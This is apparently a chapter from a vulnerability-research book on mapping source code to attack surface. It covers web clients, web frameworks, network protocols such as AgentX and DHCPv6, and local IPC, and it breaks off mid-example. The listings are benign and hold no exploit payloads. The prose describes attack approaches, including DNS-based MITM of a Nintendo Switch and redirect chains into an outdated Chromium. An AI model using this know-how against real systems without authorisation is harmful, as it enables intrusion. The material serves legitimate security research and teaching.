
        MAPPING CODE TO ATTACK
                                  2
               SURFACE
        Once we know where we are, then the world becomes as narrow as a map.
                   When we don’t know, the world feels unlimited.
                           —Liu Cixin, The Dark Forest

              As software grows in complexity, so does
             its attack surface, or the number of poten-
           tial entry points to exploit a vulnerability. In
        addition, new features could mean rushed or
less hardened code, while older features can lead to
unmaintained or deprecated code. Both present op-
portunities for vulnerabilities to be introduced, as de-
velopers’ capacity to properly secure these feature is
limited and mistakes are inevitable when dealing with
millions of lines of code. In addition, the impact of
these bugs doesn’t scale linearly. Minor issues can be
chained together into far more serious vulnerabilities.
In short, the more complex a target is, the more po-
tential vulnerabilities there are to discover.

                      For example, Microsoft Excel handles not only Excel workbook file for-
                 mats (.xls, .xlsx) but also Symbolic Link (.slk), dBase (.dbf ), Data Interchange
                 Format (.dif ), and more. And these are just file input vectors; you also have
                 to worry about inter-process communication and other network vectors. For
                 example, another process may control Excel via Component Object Model
                 (COM) interfaces, or it may fetch data from the internet via external data
                 connections. These are all potential sources for exploitable vulnerabilities.
                      The large attack surfaces of modern software can be overwhelming.
                 Less experienced vulnerability researchers may try to test every possible
                 source, falling into numerous rabbit holes and wasting effort. While this tac-
                 tic makes sense in a black-box scenario in which the researcher is limited to
                 what they can enumerate of a target’s external attack surface, code review
                 offers more efficient means to narrow down this search. For example, when
                 researching a web application, instead of laboriously brute-forcing routes
                 while attempting to dodge rate limits and web application firewalls, you can
                 simply check the relevant routing code.
                      This chapter will guide you through some of the most common attack
                 vectors and explain how you can identify and exploit them. We’ll start with
                 remote vectors such as web and other network protocols, then look at local
                 inter-process communication methods. Finally, we’ll take a deep dive into
                 file formats and how to analyze them for potentially vulnerable implemen-
                 tations. For each attack surface, we’ll study an example of source code that
                 exposes it. In addition, you’ll learn about common patterns that highlight
                 potential weaknesses in the rest of the code and how to identify them. Let’s
                 start by surveying the biggest attack surface of all: the internet.

     The Internet
                 In the past, native and web applications lived in separate worlds: native ap-
                 plications were compiled into machine code binaries that ran on specific
                 devices and platforms, while web applications were mostly written in web de-
                 velopment languages that delivered HTML, JavaScript, and CSS for browsers.
                 As such, they had vastly different attack surfaces and exploit vectors, as well
                 as varying means to retrieve and analyze their source code.
                     However, modern software development has led many web technologies
                 to enter traditionally non-web environments. From Node.js to WebAssembly,
                 there is growing overlap between native applications and those that live in
                 the browser, and software continues to integrate web functionality to power
                 new features such as backups and remote control. This makes it even more
                 important to understand web attack surfaces and vulnerable code patterns.
                 From client- to server-side vulnerabilities, you’ll learn how to identify these
                 when reviewing code.

                 Web Client Vulnerabilities
                 Web servers are one of the most popular targets for attack due to how com-
                 mon and easy to access they are. However, client-side vulnerabilities are just

as prevalent, especially for software running on native devices, such as desk-
top or mobile applications. A web client vulnerability can occur when a piece
of software attempts to load data from the web but handles the data in a
dangerous manner. Let’s look at some of the common web client vulnera-
bilities and how to find them.

Attack Vectors
The possible attack vectors vary depending on how the software parses the
data, from simply fetching a JSON document to running a full-fledged head-
less browser with JavaScript. The attack surface also depends on whether
and to what extent an attacker controls the destination the software is con-
necting to. These factors will affect the scope of your source code analysis
and the types of potential vulnerabilities you should look out for.
     If the software connects to only a hardcoded domain or URL, for in-
stance, exploiting any vulnerability will require a man-in-the-middle (MITM)
attack, in which an attacker intercepts and modifies the data a server sends
to the client. This assumes some level of control over the network or device
that the software is running on.
     In 2017, for example, researchers discovered that the Nintendo Switch
video game console used an outdated WebKit-based browser to load Wi-Fi
captive portals (think the login pages that pop up when you try to connect to
Wi-Fi networks in hotels or airports). The outdated browser was vulnerable
to CVE-2016-4657, a memory corruption vulnerability in WebKit that could
lead to arbitrary code execution.
     To check for captive portals, the Switch fetched http://conntest.nintendowifi
.net and compared the response to the expected string This is test.html page.
A captive portal would usually redirect all requests to its own login page first
and return a different response body, prompting the Switch to load the
captive portal’s login page in the browser. To hijack this flow, an attacker
could modify the Domain Name System (DNS) settings of the Switch (or the
router it’s connected to), rerouting it to an attacker-controlled web server
hosting a payload designed to exploit CVE-2016-4657.
     For some targets, the MITM requirement may make attempting an ex-
ploit too onerous or impractical. However, in the case of the Switch, since it
allows you to jailbreak the device, or cross a security boundary by executing
arbitrary instructions in what would otherwise be a locked-down device, this
was an attack vector worth pursuing.
     Having partial or full control of the URL the client requests opens up
a larger range of opportunities for exploitation. For example, when testing
the Facebook Gameroom desktop application, I noticed that the custom uni-
form resource identifier (URI) scheme fbgame://gameid/ it registered could
be manipulated to cause the application to navigate to different pages on
https://apps.facebook.com in its embedded Chromium-based browser. By ex-
ploiting a few redirection gadgets on that domain, I was able to redirect back
to my own attacker-controlled payload on a different domain that triggered a
memory corruption vulnerability (CVE-2018-6056) on the outdated version

                 of Chromium. If you’re interested, you can read more about this at https://
                 spaceraccoon.dev/applying-offensive-reverse-engineering-to-facebook-gameroom/.
                     The combination of a local input vector (in this case, the custom URI
                 scheme) and a web-based gadget chain (redirections in apps.facebook.com) is
                 an increasingly common exploit pattern due to the growing prevalence of
                 (often outdated) embedded browsers in desktop applications.

                 Identification and Classification
                 You can identify and classify web client functionality in code by searching for
                 web-related application programming interfaces (APIs) and library function
                 calls in the source code. Developers often use libraries to simplify common
                 tasks like making web requests and parsing their responses, and since they’re
                 built and distributed to be used by other developers, public documentation
                 of their functions and APIs is usually available. Many libraries are also pack-
                 aged as part of larger frameworks or software development kits (SDKs).
                 For example, .NET is an open source software framework developed by
                 Microsoft that includes the WebRequest class in the System.Net.Requests.dll
                 library. If you read the documentation at https://learn.microsoft.com/en-us/
                 dotnet/api/system.net.webrequest, you’ll find extensive information about the
                 class constructors, properties, and methods, as well as usage examples.
                      With time and experience, you’ll learn to recognize popular libraries
                 and SDKs. This allows you to quickly understand the scope of the web attack
                 surface. For example, I determined that Facebook Gameroom included an
                 embedded browser because it imported CefSharp.dll, a .NET wrapper for
                 the Chromium Embedded Framework. By tracing the usage of CefSharp
                 APIs in the decompiled C# code, I identified the most pertinent sections
                 that make up the web client attack surface of the application.
                      Take a look at Listing 2-1, which includes example code to load and ren-
                 der a web page offscreen with CefSharp.

CefSharpClient.cs using System;
                  using CefSharp;
                  using CefSharp.OffScreen;

                 class Program
                 {
                     static void
                     (string[] args)
                     {
                         const string testUrl = "https://www.google.com/";
                         Cef.Initialize(new CefSettings());
                         var browser = new ChromiumWebBrowser();
                       ¶ browser.Load(testUrl);
                         Console.ReadKey();
                         Cef.Shutdown();

                 }
            }

Listing 2-1: A simple CefSharp offscreen client

                 Based on this toy example, you can identify the ChromiumWebBrowser.Load
            API call ¶ as a key piece of code to identify possible attack vectors via an
            attacker-controlled URL. According to the CefSharp documentation, the
            ChromiumWebBrowser.LoadUrlAsync method is another option.
                 These API calls are technically closer to sinks than sources, which high-
            lights an important point: when identifying the attack surface of software at
            the macro level, the distinction between sources and sinks becomes blurred.
            Instead, focus on identifying code that’s reachable from some external input.
                 Threat modeling allows you to prioritize key classes of vulnerabilities
            and relevant portions of the source code, after which you can apply sink-to-
            source tracing to craft actual exploits.
                 We can generalize this approach of identifying imported HTTP client
            libraries and their usage to all kinds of codebases. The use of HTTP clients
            isn’t restricted to client-side software; the entire class of server-side request
            forgery vulnerabilities exists because server-side software often needs to
            make web requests as well.

            Web Server Vulnerabilities
            A huge range of software, from IoT firmware to web applications, deploys
            a web server of some kind. As it would take an entire book to explore the
            complete menagerie of web vulnerabilities, we’ll focus on identifying and
            mapping the web attack surface from source code.

            Web Frameworks
            Complex web applications usually rely on a web framework that abstracts
            away and standardizes many common web development code patterns. This
            reduces the amount of code developers need to write and maintain. Con-
            sider Listing 2-2, which is a Node.js web server that exposes a few routes us-
            ing the standard http library.

httpserver.js const http = require('http');

            const server = http.createServer((req, res) => {
                res.statusCode = 200;
             ¶ if (req.method === 'GET') {
                    if (req.url === '/') {
                        return res.end('index');
                    }
                    if (req.url === '/items') {
                        return res.end('read all items');
                    }

                           · if (req.url.startsWith('/items/')) {
                                  const id = req.url.split('/')[2];
                                  return res.end(`read item ${id}`);
                              }
                          } else if (req.method === 'POST') {
                              if (req.url === '/items') {
                                  return res.end('create an item');
                              }
                          }
                          res.statusCode = 404;
                          return res.end();
                   });

                   server.listen(8080, () => {
                       console.log('Server running at http://localhost:8080/');
                   });

Listing 2-2: A vanilla Node.js web server
                       This demonstrates the difficulties of maintaining the code of large web
                   applications without a web framework. Distinguishing between GET and POST
                   routes relies on clumsy nested conditional statements ¶, while fragile string
                   operations are used to extract path parameters like userId ·. Compare this
                   to Listing 2-3, which uses the Express web application framework.

 expressserver.js const express = require('express');
                  const app = express();

                   const itemsRouter = express.Router();
                 ¶ itemsRouter.get('/', (req, res) => {
                       res.send('read all items');
                   });
                   itemsRouter.post('/', (req, res) => {
                       res.send('create an item');
                   });
                   itemsRouter.get('/:id', (req, res) => {
                    · const { id } = req.params;
                       res.send(`read item ${id}`);
                   });
                   app.get('/', (req, res) => {
                       res.send('index');
                   });
                   app.use('/items', itemsRouter);

                   app.listen(8080, () => {
                       console.log('Server running at http://localhost:8080/');
                   });

Listing 2-3: A web server built on the Express framework

                      Not only does Express do the same thing with less code, it also abstracts
                  away common tasks like checking the request method ¶, extracting path
                  parameters ·, and handling nonexistent routes.
                      Web frameworks create opportunities to refactor code, such as moving
                  nested routes under /items to another file. This makes the code easier to
                  read both for developers and for you, the aspiring vulnerability researcher.

                  The Model–View–Controller Architecture
                  One common pattern among web frameworks is the Model–View–Controller
                  (MVC) architecture, which separates the code into three main groups. Famil-
                  iarity with this pattern will help you quickly analyze frameworks, understand
                  the flow of data through sources and sinks, and focus on the critical business
                  logic that is most likely to contain vulnerabilities instead of getting caught up
                  in irrelevant code. The MVC architecture comprises three parts:
                       Model Handles the “business logic,” such as data structures
                       View Handles the user interface, such as layouts and templates
                       Controller Handles the control flow from requests to relevant model
                       and view components
                       The routing code tends to appear around the controller components.
                  For example, if we converted the Express server from Listing 2-3 to use
                  Spring MVC, a Java web framework, the controller code would look simi-
                  lar to Listing 2-4.

ItemController.java @Controller
                  ¶ @RequestMapping("/items")
                    public class ItemController {
                        private final ItemService itemService;

                      @Autowired
                      public ItemController(ItemService itemService) {
                          this.itemService = itemService;
                      }

                      @RequestMapping(method = RequestMethod.GET)
                      public Map<String, Item> readAllItems() {
                          return itemService.getAllItems();
                      }

                      @RequestMapping(method = RequestMethod.POST)
                   · public String createItem(ItemForm item) {
                          itemService.createItem(item);
                          return "redirect:/items";
                      }

                      @RequestMapping(value = "/{id}", method = RequestMethod.GET)

                        public Map<String, Item> readItemForId(
                            @PathVariable Int id,
                            Model model
                        ) {
                            return itemService.getItemById(id);
                        }
                   }

Listing 2-4: A partial controller code snippet for Spring MVC

                        From this snippet, you can observe a few key challenges in analyzing web
                   frameworks.
                        First, while frameworks help abstract away repeated boilerplate code,
                   this comes at the cost of transparency, as the framework handles more busi-
                   ness behind the scenes. This makes it difficult to understand the code’s
                   functions unless you’re familiar with the framework’s conventions. Fortu-
                   nately, in this case it’s still fairly obvious that the @RequestMapping annotation
                   maps a handler method to a particular request route ¶. However, it isn’t
                   immediately clear what @Autowired does. The Spring documentation states
                   that this annotation “Marks a constructor, field, setter method, or config
                   method as to be autowired by Spring’s dependency injection facilities.” With-
                   out a deeper understanding of the Spring framework, this explanation is
                   inscrutable.
                        Note also the abstraction used by createItem ·, which returns "redirect:/
                   items". The redirect: prefix indicates that the route should redirect to the
                   URL that comes after it, which in this case is /items. Many frameworks use
                   conventions such as prefixes or sequences in route strings to denote spe-
                   cial functions and variables, including path parameters. You must interpret
                   route strings according to these conventions.
                        In addition, depending on the framework, the available routes may not
                   reside in a single file but rather inherit or extend other components in the
                   code. For example, to infer that a route like /items/123 exists, you need to
                   parse the @RequestMapping annotations for both the ItemController class and its
                   readItemForId method. However, suppose we were to add another controller,
                   like the one in Listing 2-5.

ThingController.java @Controller
                     @RequestMapping("/things")
                   ¶ public class ThingController extends ItemController {
                       · @RequestMapping(value = "/price", method = RequestMethod.GET)
                         public ModelAndView getPrice() {
                             // Controller code
                         }
                     }

Listing 2-5: An extended controller class

     As well as defining a /things/price route handler ·, this controller inher-
its the previous routes and methods from ItemController ¶. It is therefore
necessary to analyze framework code comprehensively, especially for object-
oriented languages.

Unknown or Unfamiliar Frameworks
While there are several well-established web frameworks that you’ll familiar-
ize yourself with over time, some applications may use custom or modified
frameworks, or not use any framework at all. They may not apply the MVC
architecture or other well-known patterns. To effectively analyze web server
code regardless of the framework used, focus on common routing and con-
troller logic that all web applications must implement.
     First, identify how the code handles the basic building blocks of an HTTP
request. Here’s a simple example of what such a request might look like:

POST /items HTTP/1.1
Host: localhost
Content-Type: application/json

{
     "name": "Apple",
     "price": 1
}

     The application needs to parse the following components:
     Request method How does the code distinguish between a GET or POST
     request? This could be done with a simple string comparison or more
     complex decorators like @GetMapping. Grepping for GET or POST might yield
     insights.
     URI To locate routes quickly in a web application codebase, look for
     URI-like strings. If you have a working instance of the application, try
     matching the behavior you observe at a particular route with the code
     that handles that route. Applications often handle routes declaratively,
     such as app.get('/items') instead of if (req.url === '/items'). Under-
     standing the declarative convention is key. Some frameworks, like Ruby
     on Rails, even centralize the routing logic in specific files, such as config/
     routes.rb.
     Headers Does the application check specific headers? Search for com-
     mon headers like Origin or Content-Type. Header parsing logic may occur
     at a higher level than individual controller code.
     Parameters How does the code extract parameters from a request?
     Other than the request URI, this is one of the most common sources of
     external input. Parameters can come from the HTTP request body (like
     the JSON content in the example request), the query string, or within
     the path.

                      Next, identify how the code handles sending HTTP responses. For ex-
                 ample, after creating the item specified in the example request and adding it
                 to the database, the web application could send:

                 HTTP/1.1 201 Created
                 Content-Type: application/json
                 Cache-Control: no-cache

                 {
                      "id": 1337,
                      "name": "Apple",
                      "price": 1
                 }

                      This time, the application code must handle sending the status code,
                 response headers, and JSON body. It may also render some of this data in
                 HTML as part of the frontend. Once again, focus on the building blocks
                 of the HTTP response and map each of them to the code that appears to
                 handle them.
                      With this approach, you can intuitively work out the patterns of any
                 framework to sufficiently map out the web attack surface based on reachable
                 routes. You can also save a lot of time and effort by reading the documenta-
                 tion, if any is available, of the particular framework the application uses.

                 Nontraditional Web Attack Surfaces
                 A software application’s web attack surface is not restricted to HTTP end-
                 points. It may use protocols or formats like Web Distributed Authoring and
                 Versioning (WebDAV) or Really Simple Syndication (RSS) that build upon
                 or extend HTTP or other web-related protocols, such as WebSocket, Web
                 Real-Time Communication (WebRTC), and many more. This means you
                 should think beyond traditional web attack vectors.
                     Additionally, a web attack surface doesn’t mean you should look only
                 for web vulnerabilities like SQL injection. For example, at Pwn2Own Tokyo
                 2019, the security researcher known as “d4rkn3ss”exploited a classic heap
                 overflow vulnerability in the httpd web service of the NETGEAR Nighthawk
                 R6700v3 router (https://www.zerodayinitiative.com/blog/2020/6/24/zdi-20-709
                 -heap-overflow-in-the-netgear-nighthawk-r6700-router).
                     Due to the limited compute and storage available on smart devices, it’s
                 actually quite rare to find fully fledged web frameworks running on these
                 devices. Instead, you’re more likely to find compiled binaries that include
                 both the web server and application logic. This increases the possibility of
                 discovering classic non-web vulnerabilities like memory corruption even in
                 the web components. It also means that your approach toward analyzing the
                 web attack surface of firmware will involve binary analysis techniques like
                 reverse engineering rather than source code analysis.
                     Finally, keep an eye out for other, less obvious ways that software can
                 present a web attack surface. While a utility desktop application like a file

                 archiving tool may not appear to interact directly with the web, consider fea-
                 tures such as autoupdating or license checking.
                     Some applications may spin up temporary web servers for inter-process
                 communication. Software sometimes requires users to sign in via the browser
                 as part of an OAuth flow. For example, as you can see in Listing 2-6, the
                 GitHub command line interface (CLI) tool can trigger a web app OAuth
                 login flow via the github.com/cli/oauth package, which starts a local HTTP
                 server before opening a web browser to the initial OAuth web URL.

oauth_webapp.go // 2020 GitHub, Inc.
                func (oa *Flow) WebAppFlow() (*api.AccessToken, error) {
                    --snip--
                    params := webapp.BrowserParams{
                        ClientID:    oa.ClientID,
                      ¶ RedirectURI: oa.CallbackURI,
                        Scopes:      oa.Scopes,
                        AllowSignup: true,
                    }
                    browserURL, err := flow.BrowserURL(host.AuthorizeURL, params)

                       // Start local HTTP server
                       go func() {
                           _ = flow.StartServer(oa.WriteSuccessHTML)
                       }()
                       --snip--
                       // Start the browser
                       err = browseURL(browserURL)
                       if err != nil {
                           return nil, fmt.Errorf("error opening the web browser: %w", err)
                       }
                       --snip--
                       // Wait for OAuth callback to start HTTP client
                     · return flow.Wait(
                           context.TODO(),
                           httpClient,
                           host.TokenURL,
                           webapp.WaitOptions{
                                ClientSecret: oa.ClientSecret,
                           }
                       )
                 }

Listing 2-6: The GitHub oauth package’s WebAppFlow function

                     After the user has successfully authenticated in the browser, the flow
                 redirects to the callback URL ¶ at the local HTTP server with the tempo-
                 rary authorization code and state. The program then uses an HTTP client ·
                 to make a POST request to the GitHub OAuth service’s token endpoint and
                 exchanges the authorization code for an access token.

                       In summary, the web attack surface covers a large variety of functional-
                 ity, from clients to servers. With web functionality creeping into all kinds of
                 software, there are plenty of opportunities for things to go wrong.

     Network Protocols
                 Software can use many other network protocols than HTTP to communi-
                 cate over networks. As with HTTP, these protocols can often be identified
                 using common network-related APIs and libraries, as well as by their data
                 structures and procedures.
                     The Transmission Control Protocol/Internet Protocol (TCP/IP) model orga-
                 nizes the communication protocols between systems in four layers:
                     Application Handles communication between applications (for exam-
                     ple, HTTP, DNS, and FTP)
                     Transport Handles communication between hosts (TCP and UDP)
                     Internet Handles communication between networks (IP and ICMP)
                     Link Handles communication between physical devices (MAC)
                      The TCP/IP model sorts the layers based on level of abstraction, with
                 the application layer covering a vast number of custom and standardized
                 protocols. Each layer relies on the next one down to function. Most software
                 defers the handling of data at the lower layers to operating system APIs or
                 standard libraries; discovering a vulnerability at these levels will create an
                 extensive impact.
                      The majority of code you will encounter deals with the application layer,
                 such as the dhcp6relay server in SONiC (see Chapter 1). Since SONiC is built
                 to run on networking devices like switches, it’s a useful reference for map-
                 ping a software’s network protocol attack surface.
                      If you examine a more recent version of SONiC’s code (https://github
                 .com/sonic-net/sonic-buildimage/tree/ba30775/src), you should see several di-
                 rectories that deal with well-known network protocols, including ntp, openssh,
                 and snmpd. Most of these are based on existing open source code; given the
                 difficulty of properly and safely implementing network protocols, it’s often
                 better to use existing libraries. For example, lldpd, which implements the
                 Link Layer Discovery Protocol (LLDP), merely contains a patch folder and a
                 Makefile that downloads the Debian lldpd package’s source code, applies the
                 patches, and builds it as per usual.
                      To identify potential network protocol attack vectors, start with the most
                 basic API calls: opening a network socket, listening to it, and receiving data.
                 Take, for example, the Inter-Chassis Communication Protocol (ICCP) server
                 initialization code in Listing 2-7, from src/iccpd/src/scheduler.c.

/* Server socket initialization */
void scheduler_server_sock_init()
{
    int optval = 1;

    struct System* sys = NULL;
    struct sockaddr_in src_addr;

    if ((sys = system_get_instance()) == NULL)
        return;

    sys->server_fd = socket(PF_INET, SOCK_STREAM, 0); ¶
    bzero(&(src_addr), sizeof(src_addr));
    src_addr.sin_family = PF_INET;
    src_addr.sin_port = htons(ICCP_TCP_PORT); ·
    src_addr.sin_addr.s_addr = INADDR_ANY; ¸

    --snip--

    if (bind(sys->server_fd, (struct sockaddr*)&(src_addr), sizeof(src_addr)) < 0)
    {
        ICCPD_LOG_INFO(__FUNCTION__, "Bind socket failed. Error");
        return;
    }

Listing 2-7: The iccpd server initialization code

                        Without a full understanding of what iccpd is supposed to do, or of the
                   protocol it implements, you can still learn a lot about the attack surface of
                   this protocol. First, notice that it uses PF_INET and SOCK_STREAM arguments to
                   socket ¶. The first argument defines the communication domain, or pro-
                   tocol family used. In this case, PF_INET is synonymous with AF_INET, which
                   according to the C standard library documentation refers to IPv4 internet
                   protocols. In short, this is indeed a network protocol. The next argument,
                   SOCK_STREAM, defines the socket type and in this case specifies it’s TCP.
                        The next line tells you that the socket address has port ICCP_TCP_PORT ·,
                   which is defined in src/iccpd/include/iccp_csm.h as port 8888. In addition,
                   you can see that the port is opened on INADDR_ANY ¸, meaning all network
                   interfaces or IP addresses associated with the system running the program.
                   With just a few lines, you’ve identified the type, port, and interfaces exposed
                   by this network protocol implementation.
                        Many of these standard protocols are documented with a Request for
                   Comments (RFC), a publication from a standards authority like the Internet
                   Engineering Task Force (IETF) that describes the design and implementa-
                   tion of the protocol. This should be your first port of call when researching
                   a protocol used by software you are targeting, as it will contain valuable in-
                   formation about the intended way to implement the protocol (developers
                   seeking to implement a particular protocol or format refer to these RFCs as
                   well). By identifying potential implementation gaps or shortcuts in the tar-
                   get, you may be able to find vulnerabilities.
                        Developers typically resort to coding their own implementations only
                   if the protocol is proprietary or niche enough to require a tailor-made

                 approach. You should prioritize these custom implementations, as they’re
                 likely to have been less rigorously tested or reviewed than open source ones.
                      When reviewing code for a protocol, focus on two main features: the
                 data structures and the procedures.

                 Data Structures
                 The data structures define how data is formatted and parsed in a network
                 protocol.
                      You can find some examples of custom data structures in the code in
                 sonic-snmpagent, which implements the Agent Extensibility Protocol (AgentX)
                 for the SONiC Switch State Service (SWSS).
                      The RFC for the AgentX protocol, RFC 2741 (https://www.ietf.org/rfc/
                 rfc2741.txt), documents the data structures used. The “Protocol Definitions”
                 section defines the AgentX protocol data unit (PDU) header format as well
                 as various PDU-specific data formats. According to that section, the AgentX
                 PDU header is “a fixed-format, 20-octet structure” with the first 4 bytes taken
                 up by the h.version, h.type, h.flags, and <reserved> fields. We can map this
                 from the code in sonic-snmpagent/src/ax_interface/pdu.py, which defines a
                 PDUHeaderTags class with a from_bytes method (see Listing 2-8).

class PDUHeaderTags(namedtuple('_PDUHeaderTags', ('version', 'type_', 'flags', 'reserved'))):
    --snip--
    @classmethod
    def from_bytes(cls, byte_string):
        return cls(
             *struct.unpack('!BBBB', byte_string[:4])
        )

Listing 2-8: The sonic-snmpagent PDU header parsing code

                     The method parses raw bytes into the expected PDU header data struc-
                 ture described in the RFC. It uses Python’s struct standard library to unpack
                 the bytes using the format characters !BBBB, meaning the bytes should be in-
                 terpreted in network byte order (big-endian) as four 1-byte unsigned chars.
                 We then pass these values to the cls keyword, which Python uses to refer to
                 the method’s class.
                     A new PDUHeaderTags instance is initialized with the provided ('version',
                 'type_', 'flags', 'reserved') values from the parsed bytes. This matches the
                 format defined in the RFC.
                     When there are discrepancies between the usage of data structures in
                 the code and the expected data structure of the protocol, vulnerabilities can
                 occur.
                     For example, the vulnerability in dhcp6relay appeared because it parsed
                 option->option_length as an unsigned 16-bit integer (also known as a short)
                 with a maximum value of 65,535 before using this as the number of bytes to
                 copy into a fixed buffer of size 4,096.
                     If you check RFC 8415 (https://www.ietf.org/rfc/rfc8415.txt), which defines
                 DHCP for IPv6, you’ll see that the “Format of DHCP Options” section states

that the option length field is a 2-octet (2-byte) unsigned integer. Meanwhile,
the length of the variable-length option data field “in octets, is specified by
option-len.” While dhcp6relay correctly parsed the option length as an un-
signed short, it didn’t adequately cater for the variable-length option data
buffer as expected by the DHCP for IPv6 protocol.
     Pay close attention to how network protocol data structures are coded
in comparison to the actual protocol documentation. These differences can
often lead to more serious issues. Look for standard terms like “MUST” and
“MUST NOT” that highlight critical implementation requirements. For ex-
ample, RFC 2741 states that octet strings are implemented like this:
        An octet string is represented by a contiguous series of bytes, be-
        ginning with a 4-byte integer (encoded according to the header’s
        NETWORK_BYTE_ORDER bit) whose value is the number of
        octets in the octet string, followed by the octets themselves. This
        representation is termed an Octet String. If the last octet does not
        end on a 4- byte offset from the start of the Octet String, padding
        bytes are appended to achieve alignment of following data. This
        padding must be added even if the Octet String is the last item in
        the PDU. Padding bytes must be zero filled.

     Consider what would happen if a developer failed to add a check that
padding bytes are correctly added and instead read all the data in a PDU in
4-byte increments. This could create an out-of-bounds read vulnerability,
as the program could read beyond the actual bytes in a PDU sent by an at-
tacker. Many of these implicit assumptions may lead to security issues even if
they aren’t explicitly called out in the RFC.

Procedures
A network protocol’s procedures define the rules and conventions of com-
munication. These procedures include the expected order and actions taken
by clients or servers. As with data structures, discrepancies or weaknesses in
procedures can cause vulnerabilities to occur.
    While data structure discrepancies usually lead to memory corruption
issues, procedure discrepancies tend to cause problems in higher-level busi-
ness logic, such as authentication and authorization.
    Knowing what constitutes a security boundary in a network protocol is
necessary to correctly identify a business logic vulnerability. Most RFCs con-
tain a section that discuss these issues. For example, RFC 2741’s “Security
Considerations” section notes that there’s no access control mechanism de-
fined in AgentX and recommends that AgentX subagents always run on the
same host as the master agent; if a network transport is used, there’s no in-
herent security mechanism in the protocol to prevent rogue subagents from
making unauthorized changes. As such, the lack of authorization is by de-
sign rather than a vulnerability (in specific AgentX implementations).

                     Some examples of procedures are:
                     Handshaking Initially exchanging messages in order to establish
                     communication
                     Session management Tracking individual sessions between the two
                     entities
                     State management Controlling the state of an individual session
                     Flow control Managing the rate and order of data transmission
                     Error handling Performing recovery or termination from invalid data
                     Encryption Ensuring the privacy, authenticity, and integrity of
                     communication
                     Session termination Performing teardown and cleanup of the session
                     in an orderly manner
                    Some of these are covered in section 7, of RFC 2741, “Elements of Pro-
                 cedure.” For example, section 7.2.2, “Subagent Processing,” states:
                         A subagent initially processes a received AgentX PDU as follows:
                         - If the received PDU is an agentx-Response-PDU:
                         1) If there are any errors parsing or interpreting the PDU, it is
                         silently dropped.
                         2) Otherwise the response is matched to the original request via
                         h.packetID, and handled in an implementation-specific manner.

                      This section specifies how the subagent should switch to different states
                 based on the type of PDU received, including handling invalid PDUs. Now,
                 let’s map this to the corresponding code in sonic-snmpagent, as shown in
                 Listing 2-9.

import asyncio

from . import logger, constants, exceptions
from .encodings import ObjectIdentifier
from .pdu import PDUHeader, PDUStream
from .pdu_implementations import RegisterPDU, ResponsePDU, OpenPDU

class AgentX(asyncio.Protocol):
--snip--
    def data_received(self, data):
         self.counter += 1
         if not (self.counter % constants.REPORTING_FREQUENCY):
              # Stayin' alive...Stayin' alive...
              # Ahh, ahh, ahh, ahh
              logger.debug("Parsed {} PDUs...".format(self.counter))
         try:
              # Each PDU type implements its own subclass and will be inferred at construction
              pdu_stream = PDUStream(data)
              for pdu in pdu_stream:

                if isinstance(pdu, ResponsePDU): ¶
                    # Parse the response
                    self.parse_response(pdu)
                else:
                    # A response will be returned if the current PDU warrants a response
                    response_pdu = pdu.make_response(self.mib_table)
                    self.transport.write(response_pdu.encode())
        except exceptions.PDUUnpackError: ·
            logger.exception('decode_error[{}]'.format(data))
        except exceptions.PDUPackError:
            logger.exception('encode_error[{}]'.format(data))
        except Exception:
            logger.exception("Uncaught AgentX proto error! [{}]".format(data))

Listing 2-9: The sonic-snmpagent PDU procedure code

                      The code correctly checks whether the PDU is an agentx-Response-PDU ¶
                 and handles it accordingly.
                      Additionally, errors in parsing the agentx-Response-PDU are silently dropped,
                 as expected, by catching the exceptions and logging them ·. However, for
                 other types of PDUs, the code doesn’t appear to check whether h.sessionID
                 corresponds to a currently established session and set res.error to notOpen
                 if not.
                      As an exercise, follow the code from https://github.com/sonic-net/sonic
                 -snmpagent/blob/4622b8d/src/ax_interface/protocol.py#L138 to confirm whether
                 sonic-snmpagent really performs this check. Hint: Does sonic-snmpagent main-
                 tain a list of currently established sessions?
                      Like the previous section on HTTP, this section provided a high-level
                 model of the attack surface (frameworks, protocol), then broke it down into
                 critical components (controllers, data structures, procedures) to identify po-
                 tential gaps in implementation. This approach efficiently covers the greatest
                 number of potential weak spots in the source code.

   Local Attack Surface
                 While network protocols such as TCP, UDP, and SCTP deal with communi-
                 cation between hosts in a network, inter-process communication (IPC) is typi-
                 cally between processes or threads on the same host. Note that a process is
                 an instance of a program rather than the program itself; as such, you can use
                 IPC to communicate among multiple instances of a program running the
                 same code. This is what comprises the local attack surface of a target.
                      Some protocols, such as AgentX, can operate both over a network and
                 via IPC. For AgentX subagents to communicate with the master agent on
                 the same host, RFC 2741 suggests local mechanisms such as shared memory,
                 named pipes, and sockets. This opens up a whole new attack surface for the
                 same protocol.
                      From the attacker’s perspective, network transport protocols expose
                 a remote attack vector, while local transport protocols expose a (surprise!)

                 local attack vector. However, the protocols used for network and local trans-
                 port sometimes overlap; for example, we can access named pipes on Win-
                 dows over a network. You’d typically use IPC in local privilege escalation
                 exploits because that’s the main security boundary in the local context. As
                 RFC 2741 notes:
                         In the case where a local transport mechanism is used and both
                         subagent and master agent are running on the same host, con-
                         nection authorization can be delegated to the operating system
                         features. The answer to the first security question then becomes:
                         “If and only if the subagent has sufficient privileges, then the oper-
                         ating system will allow the connection.”

                      Additionally, you can exploit local transport mechanisms in ways that
                 are limited or not possible over a network, such as race conditions and tim-
                 ing attacks. You must gain familiarity with OS-specific implementations and
                 protections of these mechanisms to exploit them effectively.

                 Files in Inter-Process Communication
                 From sockets to devices, developers can expose many input/output resources
                 using files to provide a common set of channels to work with. For exam-
                 ple, you can call read on a named pipe just as you would a regular file, even
                 though they serve different functions. This subsection deals with regular
                 files that we use in IPC.
                      While you can use files to exchange data between two processes, the
                 overhead required for disk I/O operations leads to worse performance than
                 in-memory IPC methods, such as named pipes.
                      As such, developers use files for IPC when persistence is needed or
                 speed is less of a concern. One specialized use is lock files, which indicate
                 that a particular resource is already in use by a running process; checking if
                 a lock file has been created can help prevent multiple instances of the same
                 program from modifying the same file. This is especially important for file
                 IPC because file operations are not atomic, which means they aren’t guaran-
                 teed to be executed in a single step.
                      For example, consider a text editor. If you start editing a file in one in-
                 stance and then absentmindedly open the file and start working on it again
                 in another, you could overwrite all the work you did earlier with a single mis-
                 placed save.
                      You can see this protection in action with the Vim editor, which comes
                 preinstalled on macOS and Ubuntu (albeit as the minimal vi version). In
                 one terminal, start editing a new file with the command vi test. In another,
                 start editing the same file again with vi test. You should see something like
                 the following:

                 E325: ATTENTION
                 Found a swap file by the name ".test.swp"
                           owned by: raccoon   dated: Mon Mar 13 ...
                          file name: /test

                          modified: no
                         user name: raccoon   host name: raccoon.local
                        process ID: 5968 (STILL RUNNING)
